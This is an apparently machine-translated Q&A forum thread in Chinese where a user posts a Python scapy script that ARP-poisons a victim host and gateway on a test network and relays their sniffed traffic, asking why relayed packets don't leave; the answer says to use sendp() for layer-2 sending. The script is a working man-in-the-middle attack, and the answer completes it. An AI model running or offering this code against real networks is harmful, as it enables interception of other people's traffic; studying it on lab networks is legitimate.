与scapy中间攻击的人

Question

我正试图在测试网络上用scapy进行中间攻击。我的设置是这样的：

现在你明白了，这是代码：

from scapy.all import *
import multiprocessing
import time
class MITM:
  packets=[]
  def __init__(self,victim=("192.168.116.143","00:0c:29:d1:aa:71" ),node2=("192.168.116.1", "00:50:56:c0:00:08")):
    self.victim=victim
    self.node2=node2
    multiprocessing.Process(target=self.arp_poison).start()
    try:
      sniff(filter='((dst %s) and (src %s)) or ( (dst %s) and (src %s))'%(self.node2[0], self.victim[0],self.victim[0],self.node2[0]),prn=lambda x:self.routep(x))
    except KeyboardInterrupt as e:
      wireshark(packets)
    #self.arp_poison()
  def routep(self,packet):
    if packet.haslayer(IP):
      packet.show()
      if packet[IP].dst==self.victim[0]:
        packet[Ether].src=packet[Ether].dst
        packet[Ether].dst=self.victim[1]
      elif packet[IP].dst==self.node2[0]:
        packet[Ether].src=packet[Ether].dst
        packet[Ether].dst=self.node2[1]
      self.packets.append(packet)
      packet.display()
      send(packet)
      print len(self.packets)
      if len(self.packets)==10:
        wireshark(self.packets)
  def arp_poison(self):
    a=ARP()
    a.psrc=self.victim[0]
    a.pdst=self.node2[0]
    b=ARP()
    b.psrc=self.node2[0]
    b.pdst=self.victim[0]
    cond=True
    while cond:
      send(b)
      send(a)
      time.sleep(5)
      #cond=False
if __name__=="__main__":
  mitm=MITM()

此代码正在VM2上运行。

Arp中毒工作正常，我检查两台机器的arp缓存，行为符合我的预期。但是在routep内部，我修改了src和dst mac地址，并尝试将收到的数据包发送到适当的主机，scapy发出警告：

WARNING: more Mac address to reach destination not found. Using broadcast

我在wireshark VM2上看到修改后的数据包没有离开机器。那为什么会这样？我错过了什么吗？

Answer 1

如果你使用scapy的send()，它适用于第三层。来自scapy的文档：

  

send（）函数将在第3层发送数据包。也就是说它将为您处理路由和第2层。 sendp（）函数将在第2层工作。

如果您使用sendp()，它将不会使用目标的Mac地址的默认值，您的警告就会消失。